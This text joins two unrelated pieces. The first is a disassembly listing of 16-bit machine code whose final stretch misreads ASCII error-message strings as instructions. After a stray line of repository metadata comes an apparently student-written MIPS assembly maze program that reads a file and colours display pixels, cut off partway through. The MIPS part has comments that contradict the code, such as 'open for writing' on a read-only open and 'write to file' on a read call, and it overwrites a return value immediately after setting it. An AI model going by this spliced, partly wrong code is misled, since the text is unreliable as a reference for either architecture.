0x017C (0x0002F8) 0x2929- f:00024 d: 297 | OR[297] = A
0x017D (0x0002FA) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x017E (0x0002FC) 0x5800- f:00054 d: 0 | B = A
0x017F (0x0002FE) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0181 (0x000302) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0182 (0x000304) 0x2102- f:00020 d: 258 | A = OR[258]
0x0183 (0x000306) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x0184 (0x000308) 0x5800- f:00054 d: 0 | B = A
0x0185 (0x00030A) 0xE600- f:00163 d: 0 | IOB , fn003
0x0186 (0x00030C) 0x1800-0x0200 f:00014 d: 0 | A = 512 (0x0200)
0x0188 (0x000310) 0xE800- f:00164 d: 0 | IOB , fn004
0x0189 (0x000312) 0xE000- f:00160 d: 0 | IOB , fn000
0x018A (0x000314) 0xEC00- f:00166 d: 0 | IOB , fn006
0x018B (0x000316) 0x3101- f:00030 d: 257 | A = (OR[257])
0x018C (0x000318) 0x080B- f:00004 d: 11 | A = A > 11 (0x000B)
0x018D (0x00031A) 0x1201- f:00011 d: 1 | A = A & 1 (0x0001)
0x018E (0x00031C) 0x2923- f:00024 d: 291 | OR[291] = A
0x018F (0x00031E) 0x3101- f:00030 d: 257 | A = (OR[257])
0x0190 (0x000320) 0x080A- f:00004 d: 10 | A = A > 10 (0x000A)
0x0191 (0x000322) 0x1201- f:00011 d: 1 | A = A & 1 (0x0001)
0x0192 (0x000324) 0x2924- f:00024 d: 292 | OR[292] = A
0x0193 (0x000326) 0x2123- f:00020 d: 291 | A = OR[291]
0x0194 (0x000328) 0x2524- f:00022 d: 292 | A = A + OR[292]
0x0195 (0x00032A) 0x2908- f:00024 d: 264 | OR[264] = A
0x0196 (0x00032C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0197 (0x00032E) 0x2708- f:00023 d: 264 | A = A - OR[264]
0x0198 (0x000330) 0x8602- f:00103 d: 2 | P = P + 2 (0x019A), A # 0
0x0199 (0x000332) 0x7030- f:00070 d: 48 | P = P + 48 (0x01C9)
0x019A (0x000334) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x019B (0x000336) 0x2925- f:00024 d: 293 | OR[293] = A
0x019C (0x000338) 0x2124- f:00020 d: 292 | A = OR[292]
0x019D (0x00033A) 0x8403- f:00102 d: 3 | P = P + 3 (0x01A0), A = 0
0x019E (0x00033C) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x019F (0x00033E) 0x2925- f:00024 d: 293 | OR[293] = A
0x01A0 (0x000340) 0x2121- f:00020 d: 289 | A = OR[289]
0x01A1 (0x000342) 0x1403- f:00012 d: 3 | A = A + 3 (0x0003)
0x01A2 (0x000344) 0x2908- f:00024 d: 264 | OR[264] = A
0x01A3 (0x000346) 0x2125- f:00020 d: 293 | A = OR[293]
0x01A4 (0x000348) 0x3908- f:00034 d: 264 | (OR[264]) = A
0x01A5 (0x00034A) 0x2100- f:00020 d: 256 | A = OR[256]
0x01A6 (0x00034C) 0x143E- f:00012 d: 62 | A = A + 62 (0x003E)
0x01A7 (0x00034E) 0x2908- f:00024 d: 264 | OR[264] = A
0x01A8 (0x000350) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01A9 (0x000352) 0x0E01- f:00007 d: 1 | A = A << 1 (0x0001)
0x01AA (0x000354) 0x0A01- f:00005 d: 1 | A = A < 1 (0x0001)
0x01AB (0x000356) 0x1400- f:00012 d: 0 | A = A + 0 (0x0000)
0x01AC (0x000358) 0x0C02- f:00006 d: 2 | A = A >> 2 (0x0002)
0x01AD (0x00035A) 0x3908- f:00034 d: 264 | (OR[264]) = A
0x01AE (0x00035C) 0x2102- f:00020 d: 258 | A = OR[258]
0x01AF (0x00035E) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x01B0 (0x000360) 0x5800- f:00054 d: 0 | B = A
0x01B1 (0x000362) 0xE000- f:00160 d: 0 | IOB , fn000
0x01B2 (0x000364) 0xEE00- f:00167 d: 0 | IOB , fn007
0x01B3 (0x000366) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x01B4 (0x000368) 0xE400- f:00162 d: 0 | IOB , fn002
0x01B5 (0x00036A) 0x2121- f:00020 d: 289 | A = OR[289]
0x01B6 (0x00036C) 0xE200- f:00161 d: 0 | IOB , fn001
0x01B7 (0x00036E) 0x0400- f:00002 d: 0 | I = 0
0x01B8 (0x000370) 0x0000- f:00000 d: 0 | PASS
0x01B9 (0x000372) 0x741F- f:00072 d: 31 | R = P + 31 (0x01D8)
0x01BA (0x000374) 0x0600- f:00003 d: 0 | I = 1
0x01BB (0x000376) 0x8606- f:00103 d: 6 | P = P + 6 (0x01C1), A # 0
0x01BC (0x000378) 0x2124- f:00020 d: 292 | A = OR[292]
0x01BD (0x00037A) 0x1E00-0xFFF9 f:00017 d: 0 | A = A - 65529 (0xFFF9)
0x01BF (0x00037E) 0x8602- f:00103 d: 2 | P = P + 2 (0x01C1), A # 0
0x01C0 (0x000380) 0x7003- f:00070 d: 3 | P = P + 3 (0x01C3)
0x01C1 (0x000382) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x01C2 (0x000384) 0x2926- f:00024 d: 294 | OR[294] = A
0x01C3 (0x000386) 0x2102- f:00020 d: 258 | A = OR[258]
0x01C4 (0x000388) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x01C5 (0x00038A) 0x5800- f:00054 d: 0 | B = A
0x01C6 (0x00038C) 0xE000- f:00160 d: 0 | IOB , fn000
0x01C7 (0x00038E) 0xE600- f:00163 d: 0 | IOB , fn003
0x01C8 (0x000390) 0xEC00- f:00166 d: 0 | IOB , fn006
0x01C9 (0x000392) 0x2119- f:00020 d: 281 | A = OR[281]
0x01CA (0x000394) 0x8402- f:00102 d: 2 | P = P + 2 (0x01CC), A = 0
0x01CB (0x000396) 0x700C- f:00070 d: 12 | P = P + 12 (0x01D7)
0x01CC (0x000398) 0x2121- f:00020 d: 289 | A = OR[289]
0x01CD (0x00039A) 0x8602- f:00103 d: 2 | P = P + 2 (0x01CF), A # 0
0x01CE (0x00039C) 0x7009- f:00070 d: 9 | P = P + 9 (0x01D7)
0x01CF (0x00039E) 0x101B- f:00010 d: 27 | A = 27 (0x001B)
0x01D0 (0x0003A0) 0x2928- f:00024 d: 296 | OR[296] = A
0x01D1 (0x0003A2) 0x2121- f:00020 d: 289 | A = OR[289]
0x01D2 (0x0003A4) 0x2929- f:00024 d: 297 | OR[297] = A
0x01D3 (0x0003A6) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x01D4 (0x0003A8) 0x5800- f:00054 d: 0 | B = A
0x01D5 (0x0003AA) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x01D6 (0x0003AC) 0x7C09- f:00076 d: 9 | R = OR[9]
0x01D7 (0x0003AE) 0x0200- f:00001 d: 0 | EXIT
0x01D8 (0x0003B0) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x01D9 (0x0003B2) 0x2927- f:00024 d: 295 | OR[295] = A
0x01DA (0x0003B4) 0x3122- f:00030 d: 290 | A = (OR[290])
0x01DB (0x0003B6) 0x8402- f:00102 d: 2 | P = P + 2 (0x01DD), A = 0
0x01DC (0x0003B8) 0x7014- f:00070 d: 20 | P = P + 20 (0x01F0)
0x01DD (0x0003BA) 0x1009- f:00010 d: 9 | A = 9 (0x0009)
0x01DE (0x0003BC) 0x2928- f:00024 d: 296 | OR[296] = A
0x01DF (0x0003BE) 0x2122- f:00020 d: 290 | A = OR[290]
0x01E0 (0x0003C0) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x01E1 (0x0003C2) 0x2929- f:00024 d: 297 | OR[297] = A
0x01E2 (0x0003C4) 0x1064- f:00010 d: 100 | A = 100 (0x0064)
0x01E3 (0x0003C6) 0x292A- f:00024 d: 298 | OR[298] = A
0x01E4 (0x0003C8) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x01E5 (0x0003CA) 0x5800- f:00054 d: 0 | B = A
0x01E6 (0x0003CC) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x01E8 (0x0003D0) 0x7C09- f:00076 d: 9 | R = OR[9]
0x01E9 (0x0003D2) 0x2006- f:00020 d: 6 | A = OR[6]
0x01EA (0x0003D4) 0x140B- f:00012 d: 11 | A = A + 11 (0x000B)
0x01EB (0x0003D6) 0x2908- f:00024 d: 264 | OR[264] = A
0x01EC (0x0003D8) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01ED (0x0003DA) 0x0400- f:00002 d: 0 | I = 0
0x01EE (0x0003DC) 0x0000- f:00000 d: 0 | PASS
0x01EF (0x0003DE) 0x2927- f:00024 d: 295 | OR[295] = A
0x01F0 (0x0003E0) 0x3122- f:00030 d: 290 | A = (OR[290])
0x01F1 (0x0003E2) 0x2924- f:00024 d: 292 | OR[292] = A
0x01F2 (0x0003E4) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x01F3 (0x0003E6) 0x3922- f:00034 d: 290 | (OR[290]) = A
0x01F4 (0x0003E8) 0x2127- f:00020 d: 295 | A = OR[295]
0x01F5 (0x0003EA) 0x0200- f:00001 d: 0 | EXIT
0x01F6 (0x0003EC) 0x436F- f:00041 d: 367 | C = 1, io 0557 = BZ
0x01F7 (0x0003EE) 0x6E63- f:00067 d: 99 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0063 ****
0x01F8 (0x0003F0) 0x656E- f:00062 d: 366 | A = A + OR[B] | **** non-standard encoding with D:0x016E ****
0x01F9 (0x0003F2) 0x7472- f:00072 d: 114 | R = P + 114 (0x026B)
0x01FA (0x0003F4) 0x6174- f:00060 d: 372 | A = OR[B] | **** non-standard encoding with D:0x0174 ****
0x01FB (0x0003F6) 0x6F72- f:00067 d: 370 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0172 ****
0x01FC (0x0003F8) 0x206F- f:00020 d: 111 | A = OR[111]
0x01FD (0x0003FA) 0x7264- f:00071 d: 100 | P = P - 100 (0x0199)
0x01FE (0x0003FC) 0x696E- f:00064 d: 366 | OR[B] = A | **** non-standard encoding with D:0x016E ****
0x01FF (0x0003FE) 0x616C- f:00060 d: 364 | A = OR[B] | **** non-standard encoding with D:0x016C ****
0x0200 (0x000400) 0x0000- f:00000 d: 0 | PASS
0x0201 (0x000402) 0x696E- f:00064 d: 366 | OR[B] = A | **** non-standard encoding with D:0x016E ****
0x0202 (0x000404) 0x7075- f:00070 d: 117 | P = P + 117 (0x0277)
0x0203 (0x000406) 0x7420- f:00072 d: 32 | R = P + 32 (0x0223)
0x0204 (0x000408) 0x6368- f:00061 d: 360 | A = A & OR[B] | **** non-standard encoding with D:0x0168 ****
0x0205 (0x00040A) 0x616E- f:00060 d: 366 | A = OR[B] | **** non-standard encoding with D:0x016E ****
0x0206 (0x00040C) 0x6E65- f:00067 d: 101 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0065 ****
0x0207 (0x00040E) 0x6C20- f:00066 d: 32 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x0020 ****
0x0208 (0x000410) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x0209 (0x000412) 0x726F- f:00071 d: 111 | P = P - 111 (0x019A)
0x020A (0x000414) 0x7200- f:00071 d: 0 | P = P - 0 (0x020A)
0x020B (0x000416) 0x6F75- f:00067 d: 373 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0175 ****
0x020C (0x000418) 0x7470- f:00072 d: 112 | R = P + 112 (0x027C)
0x020D (0x00041A) 0x7574- f:00072 d: 372 | R = P + 372 (0x0381)
0x020E (0x00041C) 0x2063- f:00020 d: 99 | A = OR[99]
0x020F (0x00041E) 0x6861- f:00064 d: 97 | OR[B] = A | **** non-standard encoding with D:0x0061 ****
0x0210 (0x000420) 0x6E6E- f:00067 d: 110 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x006E ****
0x0211 (0x000422) 0x656C- f:00062 d: 364 | A = A + OR[B] | **** non-standard encoding with D:0x016C ****
0x0212 (0x000424) 0x2065- f:00020 d: 101 | A = OR[101]
0x0213 (0x000426) 0x7272- f:00071 d: 114 | P = P - 114 (0x01A1)
0x0214 (0x000428) 0x6F72- f:00067 d: 370 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0172 ****
0x0215 (0x00042A) 0x0000- f:00000 d: 0 | PASS
0x0216 (0x00042C) 0x696E- f:00064 d: 366 | OR[B] = A | **** non-standard encoding with D:0x016E ****
0x0217 (0x00042E) 0x7075- f:00070 d: 117 | P = P + 117 (0x028C)
0x0218 (0x000430) 0x7420- f:00072 d: 32 | R = P + 32 (0x0238)
0x0219 (0x000432) 0x6368- f:00061 d: 360 | A = A & OR[B] | **** non-standard encoding with D:0x0168 ****
0x021A (0x000434) 0x616E- f:00060 d: 366 | A = OR[B] | **** non-standard encoding with D:0x016E ****
0x021B (0x000436) 0x6E65- f:00067 d: 101 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0065 ****
0x021C (0x000438) 0x6C20- f:00066 d: 32 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x0020 ****
0x021D (0x00043A) 0x7469- f:00072 d: 105 | R = P + 105 (0x0286)
0x021E (0x00043C) 0x6D65- f:00066 d: 357 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x0165 ****
0x021F (0x00043E) 0x6F75- f:00067 d: 373 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0175 ****
0x0220 (0x000440) 0x7400- f:00072 d: 0 | R = P + 0 (0x0220)
0x0221 (0x000442) 0x6F75- f:00067 d: 373 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0175 ****
0x0222 (0x000444) 0x7470- f:00072 d: 112 | R = P + 112 (0x0292)
0x0223 (0x000446) 0x7574- f:00072 d: 372 | R = P + 372 (0x0397)
0x0224 (0x000448) 0x2063- f:00020 d: 99 | A = OR[99]
0x0225 (0x00044A) 0x6861- f:00064 d: 97 | OR[B] = A | **** non-standard encoding with D:0x0061 ****
0x0226 (0x00044C) 0x6E6E- f:00067 d: 110 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x006E ****
0x0227 (0x00044E) 0x656C- f:00062 d: 364 | A = A + OR[B] | **** non-standard encoding with D:0x016C ****
0x0228 (0x000450) 0x2074- f:00020 d: 116 | A = OR[116]
0x0229 (0x000452) 0x696D- f:00064 d: 365 | OR[B] = A | **** non-standard encoding with D:0x016D ****
0x022A (0x000454) 0x656F- f:00062 d: 367 | A = A + OR[B] | **** non-standard encoding with D:0x016F ****
0x022B (0x000456) 0x7574- f:00072 d: 372 | R = P + 372 (0x039F)
0x022C (0x000458) 0x0000- f:00000 d: 0 | PASS
0x022D (0x00045A) 0x7265- f:00071 d: 101 | P = P - 101 (0x01C8)
0x022E (0x00045C) 0x6365- f:00061 d: 357 | A = A & OR[B] | **** non-standard encoding with D:0x0165 ****
0x022F (0x00045E) 0x6976- f:00064 d: 374 | OR[B] = A | **** non-standard encoding with D:0x0176 ****
0x0230 (0x000460) 0x6564- f:00062 d: 356 | A = A + OR[B] | **** non-standard encoding with D:0x0164 ****
0x0231 (0x000462) 0x2061- f:00020 d: 97 | A = OR[97]
0x0232 (0x000464) 0x2062- f:00020 d: 98 | A = OR[98]
0x0233 (0x000466) 0x6164- f:00060 d: 356 | A = OR[B] | **** non-standard encoding with D:0x0164 ****
0x0234 (0x000468) 0x2069- f:00020 d: 105 | A = OR[105]
0x0235 (0x00046A) 0x6E70- f:00067 d: 112 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0070 ****
0x0236 (0x00046C) 0x7574- f:00072 d: 372 | R = P + 372 (0x03AA)
0x0237 (0x00046E) 0x204C- f:00020 d: 76 | A = OR[76]
0x0238 (0x000470) 0x4350- f:00041 d: 336 | C = 1, io 0520 = BZ
0x0239 (0x000472) 0x0000- f:00000 d: 0 | PASS
0x023A (0x000474) 0x4D4F- f:00046 d: 335 | A = A >> B | **** non-standard encoding with D:0x014F ****
0x023B (0x000476) 0x5320- f:00051 d: 288 | A = A & B | **** non-standard encoding with D:0x0120 ****
0x023C (0x000478) 0x6275- f:00061 d: 117 | A = A & OR[B] | **** non-standard encoding with D:0x0075 ****
0x023D (0x00047A) 0x6666- f:00063 d: 102 | A = A - OR[B] | **** non-standard encoding with D:0x0066 ****
0x023E (0x00047C) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x023F (0x00047E) 0x7320- f:00071 d: 288 | P = P - 288 (0x011F)
0x0240 (0x000480) 0x6578- f:00062 d: 376 | A = A + OR[B] | **** non-standard encoding with D:0x0178 ****
0x0241 (0x000482) 0x6861- f:00064 d: 97 | OR[B] = A | **** non-standard encoding with D:0x0061 ****
0x0242 (0x000484) 0x7573- f:00072 d: 371 | R = P + 371 (0x03B5)
0x0243 (0x000486) 0x7465- f:00072 d: 101 | R = P + 101 (0x02A8)
0x0244 (0x000488) 0x6400- f:00062 d: 0 | A = A + OR[B]
0x0245 (0x00048A) 0x6C6F- f:00066 d: 111 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x006F ****
0x0246 (0x00048C) 0x6361- f:00061 d: 353 | A = A & OR[B] | **** non-standard encoding with D:0x0161 ****
0x0247 (0x00048E) 0x6C20- f:00066 d: 32 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x0020 ****
0x0248 (0x000490) 0x6275- f:00061 d: 117 | A = A & OR[B] | **** non-standard encoding with D:0x0075 ****
0x0249 (0x000492) 0x6666- f:00063 d: 102 | A = A - OR[B] | **** non-standard encoding with D:0x0066 ****
0x024A (0x000494) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x024B (0x000496) 0x7320- f:00071 d: 288 | P = P - 288 (0x012B)
0x024C (0x000498) 0x6578- f:00062 d: 376 | A = A + OR[B] | **** non-standard encoding with D:0x0178 ****
0x024D (0x00049A) 0x6861- f:00064 d: 97 | OR[B] = A | **** non-standard encoding with D:0x0061 ****
0x024E (0x00049C) 0x7573- f:00072 d: 371 | R = P + 371 (0x03C1)
0x024F (0x00049E) 0x7465- f:00072 d: 101 | R = P + 101 (0x02B4)
0x0250 (0x0004A0) 0x6400- f:00062 d: 0 | A = A + OR[B]
0x0251 (0x0004A2) 0x4D4F- f:00046 d: 335 | A = A >> B | **** non-standard encoding with D:0x014F ****
0x0252 (0x0004A4) 0x5320- f:00051 d: 288 | A = A & B | **** non-standard encoding with D:0x0120 ****
0x0253 (0x0004A6) 0x4441- f:00042 d: 65 | C = 1, IOB = DN | **** non-standard encoding with D:0x0041 ****
0x0254 (0x0004A8) 0x4C73- f:00046 d: 115 | A = A >> B | **** non-standard encoding with D:0x0073 ****
0x0255 (0x0004AA) 0x2065- f:00020 d: 101 | A = OR[101]
0x0256 (0x0004AC) 0x7868- f:00074 d: 104 | P = OR[104]
0x0257 (0x0004AE) 0x6175- f:00060 d: 373 | A = OR[B] | **** non-standard encoding with D:0x0175 ****
0x0258 (0x0004B0) 0x7374- f:00071 d: 372 | P = P - 372 (0x00E4)
0x0259 (0x0004B2) 0x6564- f:00062 d: 356 | A = A + OR[B] | **** non-standard encoding with D:0x0164 ****
0x025A (0x0004B4) 0x0000- f:00000 d: 0 | PASS
0x025B (0x0004B6) 0x4372- f:00041 d: 370 | C = 1, io 0562 = BZ
0x025C (0x0004B8) 0x6179- f:00060 d: 377 | A = OR[B] | **** non-standard encoding with D:0x0179 ****
0x025D (0x0004BA) 0x2050- f:00020 d: 80 | A = OR[80]
0x025E (0x0004BC) 0x4F4C- f:00047 d: 332 | A = A << B | **** non-standard encoding with D:0x014C ****
0x025F (0x0004BE) 0x4C20- f:00046 d: 32 | A = A >> B | **** non-standard encoding with D:0x0020 ****
0x0260 (0x0004C0) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x0261 (0x0004C2) 0x726F- f:00071 d: 111 | P = P - 111 (0x01F2)
0x0262 (0x0004C4) 0x7200- f:00071 d: 0 | P = P - 0 (0x0262)
0x0263 (0x0004C6) 0x696E- f:00064 d: 366 | OR[B] = A | **** non-standard encoding with D:0x016E ****
0x0264 (0x0004C8) 0x7075- f:00070 d: 117 | P = P + 117 (0x02D9)
0x0265 (0x0004CA) 0x7420- f:00072 d: 32 | R = P + 32 (0x0285)
0x0266 (0x0004CC) 0x7472- f:00072 d: 114 | R = P + 114 (0x02D8)
0x0267 (0x0004CE) 0x616E- f:00060 d: 366 | A = OR[B] | **** non-standard encoding with D:0x016E ****
0x0268 (0x0004D0) 0x7366- f:00071 d: 358 | P = P - 358 (0x0102)
0x0269 (0x0004D2) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x026A (0x0004D4) 0x206C- f:00020 d: 108 | A = OR[108]
0x026B (0x0004D6) 0x656E- f:00062 d: 366 | A = A + OR[B] | **** non-standard encoding with D:0x016E ****
0x026C (0x0004D8) 0x6774- f:00063 d: 372 | A = A - OR[B] | **** non-standard encoding with D:0x0174 ****
0x026D (0x0004DA) 0x6820- f:00064 d: 32 | OR[B] = A | **** non-standard encoding with D:0x0020 ****
0x026E (0x0004DC) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x026F (0x0004DE) 0x726F- f:00071 d: 111 | P = P - 111 (0x0200)
0x0270 (0x0004E0) 0x7200- f:00071 d: 0 | P = P - 0 (0x0270)
0x0271 (0x0004E2) 0x6F75- f:00067 d: 373 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0175 ****
0x0272 (0x0004E4) 0x7470- f:00072 d: 112 | R = P + 112 (0x02E2)
0x0273 (0x0004E6) 0x7574- f:00072 d: 372 | R = P + 372 (0x03E7)
0x0274 (0x0004E8) 0x2074- f:00020 d: 116 | A = OR[116]
0x0275 (0x0004EA) 0x7261- f:00071 d: 97 | P = P - 97 (0x0214)
0x0276 (0x0004EC) 0x6E73- f:00067 d: 115 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0073 ****
0x0277 (0x0004EE) 0x6665- f:00063 d: 101 | A = A - OR[B] | **** non-standard encoding with D:0x0065 ****
0x0278 (0x0004F0) 0x7220- f:00071 d: 32 | P = P - 32 (0x0258)
0x0279 (0x0004F2) 0x6C65- f:00066 d: 101 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x0065 ****
0x027A (0x0004F4) 0x6E67- f:00067 d: 103 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0067 ****
0x027B (0x0004F6) 0x7468- f:00072 d: 104 | R = P + 104 (0x02E3)
0x027C (0x0004F8) 0x2065- f:00020 d: 101 | A = OR[101]
0x027D (0x0004FA) 0x7272- f:00071 d: 114 | P = P - 114 (0x020B)
0x027E (0x0004FC) 0x6F72- f:00067 d: 370 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0172 ****
0x027F (0x0004FE) 0x0000- f:00000 d: 0 | PASS
0x0280 (0x000500) 0x5641- f:00053 d: 65 | A = A - B | **** non-standard encoding with D:0x0041 ****
0x0281 (0x000502) 0x5820- f:00054 d: 32 | B = A | **** non-standard encoding with D:0x0020 ****
0x0282 (0x000504) 0x696E- f:00064 d: 366 | OR[B] = A | **** non-standard encoding with D:0x016E ****
0x0283 (0x000506) 0x7465- f:00072 d: 101 | R = P + 101 (0x02E8)
0x0284 (0x000508) 0x7266- f:00071 d: 102 | P = P - 102 (0x021E)
0x0285 (0x00050A) 0x6163- f:00060 d: 355 | A = OR[B] | **** non-standard encoding with D:0x0163 ****
0x0286 (0x00050C) 0x6520- f:00062 d: 288 | A = A + OR[B] | **** non-standard encoding with D:0x0120 ****
0x0287 (0x00050E) 0x7365- f:00071 d: 357 | P = P - 357 (0x0122)
0x0288 (0x000510) 0x6C65- f:00066 d: 101 | OR[B] = OR[B] + 1 | **** non-standard encoding with D:0x0065 ****
0x0289 (0x000512) 0x6374- f:00061 d: 372 | A = A & OR[B] | **** non-standard encoding with D:0x0174 ****
0x028A (0x000514) 0x2065- f:00020 d: 101 | A = OR[101]
0x028B (0x000516) 0x7272- f:00071 d: 114 | P = P - 114 (0x0219)
0x028C (0x000518) 0x6F72- f:00067 d: 370 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0172 ****
0x028D (0x00051A) 0x0000- f:00000 d: 0 | PASS
0x028E (0x00051C) 0x556E- f:00052 d: 366 | A = A + B | **** non-standard encoding with D:0x016E ****
0x028F (0x00051E) 0x6B6E- f:00065 d: 366 | OR[B] = A + OR[B] | **** non-standard encoding with D:0x016E ****
0x0290 (0x000520) 0x6F77- f:00067 d: 375 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0177 ****
0x0291 (0x000522) 0x6E20- f:00067 d: 32 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0020 ****
0x0292 (0x000524) 0x6572- f:00062 d: 370 | A = A + OR[B] | **** non-standard encoding with D:0x0172 ****
0x0293 (0x000526) 0x726F- f:00071 d: 111 | P = P - 111 (0x0224)
0x0294 (0x000528) 0x7220- f:00071 d: 32 | P = P - 32 (0x0274)
0x0295 (0x00052A) 0x636F- f:00061 d: 367 | A = A & OR[B] | **** non-standard encoding with D:0x016F ****
0x0296 (0x00052C) 0x6E64- f:00067 d: 100 | OR[B] = OR[B] - 1 | **** non-standard encoding with D:0x0064 ****
0x0297 (0x00052E) 0x6974- f:00064 d: 372 | OR[B] = A | **** non-standard encoding with D:0x0174 ****
0x0298 (0x000530) 0x696F- f:00064 d: 367 | OR[B] = A | **** non-standard encoding with D:0x016F ****
0x0299 (0x000532) 0x6E00- f:00067 d: 0 | OR[B] = OR[B] - 1
0x029A (0x000534) 0x0000- f:00000 d: 0 | PASS
0x029B (0x000536) 0x0000- f:00000 d: 0 | PASS
| 84.307004
| 144
| 0.479159
|
23af1e30ca42bda581dafa819c66e2b1c769f157
| 10,457
|
asm
|
Assembly
|
Maze_3.asm
|
BitorqubitT/MIPS-basics
|
e0092cfed1e3e09d885ab5debbc26d6191961fed
|
[
"MIT"
] | 1
|
2019-11-02T11:50:08.000Z
|
2019-11-02T11:50:08.000Z
|
Maze_3.asm
|
BitorqubitT/MIPS-basics
|
e0092cfed1e3e09d885ab5debbc26d6191961fed
|
[
"MIT"
] | null | null | null |
Maze_3.asm
|
BitorqubitT/MIPS-basics
|
e0092cfed1e3e09d885ab5debbc26d6191961fed
|
[
"MIT"
] | null | null | null |
.globl main
.data
File: .asciiz "c:\\check.txt" #Filename for input
Buffer: .space 2048 #Space used as buffer
Winnermsg: .asciiz "You have won!!!!!!!!!!!" #Winner message.
Exitmsg: .asciiz "You have quit the game" #Quit game message.
.text
########################################################################################
li $t1, 0x000000ff #Loading blue in register.
li $t2, 0x00000000 #Loading black in register
li $t3, 0x00ffff00 #Loading yellow in register.
li $t4, 0x0000ff00 #Loading green in register
li $s1, 0 #Current player row counter.
li $s2, 0 #Current player column counter.
li $s3, 0 #This will be used to pick a character from the string.
li $s6, 0 #New player row counter.
li $s7, 0 #New player column counter.
li $t0, -4 #Current iteration.
li $v1, 0 #Current player row. (Will be returned)
MazeCreater:
#Open a file.
li $v0, 13 #System call for open file.
la $a0, File #Output file name.
li $a1, 0 #Open for writing.
li $a2, 0 #Mode is ignored.
syscall #Open a file (file descriptor returned in $v0)
move $s6, $v0 #Put file descriptor content in s6.
#Read from file to buffer
li $v0, 14 #System call for write to file.
move $a0, $s6
la $a1, Buffer #Put content of buffer in a1.
li $a2, 2048 #Max characters.
syscall #Write to file.
la $a0, Buffer #Load buffer in a0 to print.
add $a0, $a0, $s3 #Add s3 to a0 this allows us to choose which character we want.
lb $a0, 0($a0) #Load 0(a0) in a0 this gives us a single character.
move $s0, $a0 #Move character to s0.
#Here we check the different cases that might occur for the different inputs.
beq $s0, 119, L0 #When s0 = w go to L0
beq $s0, 112, L1 #When s0 = p go to L1
beq $s0, 115, L2 #When s0 = s go to L2
beq $s0, 117, L3 #When s0 = u go to L3
beq $s0, 10, L4 #When s0 = u go to L4(s0 is an enter).
beq $s3, 88, Exit #This is an end condition, however this could be more dynamic.
back:
addi $t0, $t0, 1 #Incrementing current location to next pixel.
add $s3, $s3, 1 #Go to next character.
add $s2, $s2, 1 #s0+1 (Add to Colomn).
j MazeCreater #Jump to makeRedLoop.
#Case for the different inputs. #When a color is read from the text file. Later we will also add enemy and candy here.
L0: #Set a0 equal to blue.
addi $gp, $gp, 4 #Go to next pixel in display
sw $t1, -4($gp) #Change current pixel to blue
j back #Jump to back.
L1: #Set a0 equal to black.
addi $gp, $gp, 4 #Go to next pixel in display
sw $t2, -4($gp) #Change current pixel to black
j back #Jump to back.
L2: #Set a0 equal to yellow.
addi $gp, $gp, 4 #Go to next pixel in display
sw $t3, -4($gp) #Change current pixel to yellow
move $v1, $s1 #Save player position column.
move $s7, $s2 #Save the player position and print to check.
j back #Jump to back.
L3: #Set a0 equal to green.
addi $gp, $gp, 4 #Go to next pixel in display
sw $t4, -4($gp) #Change current pixel to green
j back #Jump to back.
L4:
add $s3, $s3, 1 #Add 1 to s3.
add $s1, $s1, 1 #Add 1 to the row counter.
li $s2, 0 #Reset Column
j MazeCreater #Jump to rowLoop
Exit:
move $v0, $s7 #Move s7 to v0, rhis is the return value player row.
li $v0, 16 #Close file system call.
move $a3, $s6 #Move s6 to a3.
syscall #Close file.
jr $ra
########################################################################################
#######################################################################################
ProcessInput:
Input:
move $s6, $s1 #Copy current row position to new.
move $s7, $s2 #Copy current column position to new.
